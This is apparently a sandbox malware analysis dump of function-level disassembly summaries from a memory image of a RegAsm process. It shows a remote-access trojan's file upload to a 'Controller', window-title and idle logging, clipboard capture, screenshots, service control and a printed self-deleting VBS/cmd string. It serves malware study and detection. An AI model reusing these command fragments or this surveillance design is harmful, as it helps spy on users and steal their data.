GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

Uploading file to Controller: , xrefs: 00408DD5
ReadFile error, xrefs: 00408FC8
SetFilePointerEx error, xrefs: 00408FD4
NG, xrefs: 00408C17

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: b7cb2f90826dd2fc6d53e8e3a20eef723a0e7d00d26ee063e73383acfb66c48b
Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
Opcode Fuzzy Hash: b7cb2f90826dd2fc6d53e8e3a20eef723a0e7d00d26ee063e73383acfb66c48b
Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927

Strings

PG, xrefs: 0040A907
pQG, xrefs: 0040A761
PG, xrefs: 0040A7AC
pQG, xrefs: 0040A771
8SG, xrefs: 0040A802
8SG, xrefs: 0040A7F7

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Uniqueness

Uniqueness Score: -1.00%

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Uniqueness

Uniqueness Score: -1.00%

Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419FB9
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
Sleep.KERNEL32(000003E8), ref: 0041A0FD
GetLocalTime.KERNEL32(?), ref: 0041A105
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4

Strings

PG, xrefs: 0041A016
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09A, 0041A0BB, 0041A129
PG, xrefs: 0041A0C9
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09F
PG, xrefs: 0041A1AD

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
API String ID: 489098229-1431523004
Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32 ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.ADVAPI32(00000000), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

8SG, xrefs: 0040D80F
exepath, xrefs: 0040D831
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967
Temp, xrefs: 0040D89A
""", 0, xrefs: 0040D8E1
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9
.vbs, xrefs: 0040D85F
open, xrefs: 0040D9B2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 5b50d1d19a90379a4fa6c86bf735b805f6c325a9dd772d27b08dfba700ce387e
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 5b50d1d19a90379a4fa6c86bf735b805f6c325a9dd772d27b08dfba700ce387e
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Uniqueness

Uniqueness Score: -1.00%

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Uniqueness

Uniqueness Score: -1.00%

Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6

GetLastError.KERNEL32 ref: 00455CEF
__dosmaperr.LIBCMT ref: 00455CF6
GetFileType.KERNEL32 ref: 00455D02
GetLastError.KERNEL32 ref: 00455D0C
__dosmaperr.LIBCMT ref: 00455D15
CloseHandle.KERNEL32(00000000), ref: 00455D35
CloseHandle.KERNEL32(?), ref: 00455E7F
GetLastError.KERNEL32 ref: 00455EB1
__dosmaperr.LIBCMT ref: 00455EB8

Strings

H, xrefs: 00455E3D

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
__alloca_probe_16.LIBCMT ref: 00453EEA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
__alloca_probe_16.LIBCMT ref: 00453F94
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
__freea.LIBCMT ref: 00454003
__freea.LIBCMT ref: 0045400F

Strings

\@E, xrefs: 00453F37, 00453DF1

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \@E
API String ID: 201697637-1814623452
Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768

Uniqueness

Uniqueness Score: -1.00%

Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450A94
_free.LIBCMT ref: 00450AA2
_free.LIBCMT ref: 00450BD0
_free.LIBCMT ref: 00450BDB

Strings

\&G, xrefs: 00450C1C
\&G, xrefs: 00450C24
`&G, xrefs: 00450C34

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98

Uniqueness

Uniqueness Score: -1.00%

Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 00414C60, 00414C68, 00414C6C
65535, xrefs: 00414BB3

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040AD38
Sleep.KERNEL32(000001F4), ref: 0040AD43
GetForegroundWindow.USER32 ref: 0040AD49
GetWindowTextLengthW.USER32 ref: 0040AD52
GetWindowTextW.USER32 ref: 0040AD86
Sleep.KERNEL32(000003E8), ref: 0040AE54

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

], xrefs: 0040ADE8
[, xrefs: 0040ADEE
{ User has been idle for , xrefs: 0040AE86
minutes }, xrefs: 0040AE7A

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: cdcb862763e0f4fcf2b8f963fbf39a1c29f84f6dab9d3eba07931eb85ffe7d43
Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
Opcode Fuzzy Hash: cdcb862763e0f4fcf2b8f963fbf39a1c29f84f6dab9d3eba07931eb85ffe7d43
Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Uniqueness

Uniqueness Score: -1.00%

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32 ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32 ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

CloseChat, xrefs: 00405609
DisplayMessage, xrefs: 004055EC
GetMessage, xrefs: 004055F8

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: aab679f193c82e1c8d32b18bf4d6cf1b9789b97c094c02d801af62659f05ec29
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: aab679f193c82e1c8d32b18bf4d6cf1b9789b97c094c02d801af62659f05ec29
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
CloseHandle.KERNEL32(00000000), ref: 00417DE5
DeleteFileA.KERNEL32(00000000), ref: 00417DF4
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

0VG, xrefs: 00417DB5
Temp, xrefs: 00417D00
@, xrefs: 00417D8A
0VG, xrefs: 00417E21
<, xrefs: 00417D83

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32 ref: 0041696C
GlobalLock.KERNEL32 ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 0fd2c747e19719d3901cedb71c0bc3d115524066eb5b30ae97a07fd7f06fdd7e
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 0fd2c747e19719d3901cedb71c0bc3d115524066eb5b30ae97a07fd7f06fdd7e
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA

Uniqueness

Uniqueness Score: -1.00%

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
